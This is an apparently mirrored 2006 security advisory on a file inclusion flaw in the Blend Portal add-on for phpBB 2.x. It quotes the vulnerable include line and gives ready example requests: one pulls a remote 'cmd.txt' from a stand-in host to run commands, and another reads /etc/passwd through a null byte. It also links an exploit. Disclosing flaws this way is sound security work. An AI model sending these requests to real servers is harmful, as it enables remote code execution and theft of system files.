Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12878
HistoryMay 30, 2006 - 12:00 a.m.

Advisory: Blend Portal <= 1.2.0 for phpBB 2.x (blend_data/blend_common.php) File Inclusion Vulnerability

2006-05-3000:00:00
vulners.com
23

–Security Report–
Advisory: Blend Portal <= 1.2.0 for phpBB 2.x
(blend_data/blend_common.php) File Inclusion Vulnerability.

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 28/05/06 07:52 PM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: phpbb-portal (http://www.phpbb-portal.com/&#41;
Version: 1.2.0 and prior versions must be affected.
About: Via this methods remote attacker can include arbitrary
internal/external files to phpBB. phpbb_root_path
variable in /blend_data/blend_common.php did not sanitized properly
before using it.You can find vulnerable code in
blend_common.php at lines 74-77
-Source in blend_common.php-
74: else
75: {
76: include_once($phpbb_root_path . BLEND_DATA_PATH . BLEND_CACHE_PATH
.'config.'. $phpEx);
77: }
-End of source-
Level: Highly Critical

How&Example:
Succesful exploitation needs register_globals on & allow url_fopen on
GET ->
http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE]
EXAMPLE ->
http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt?
EXAMPLE ->
http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=/etc/passwd%00

Timeline:

  • 28/05/2006: Vulnerability found.
  • 28/05/2006: Contacted with vendor and waiting reply.

Exploit: http://www.nukedx.com/?getxpl=41

Original advisory can be found at: http://www.nukedx.com/?viewdoc=41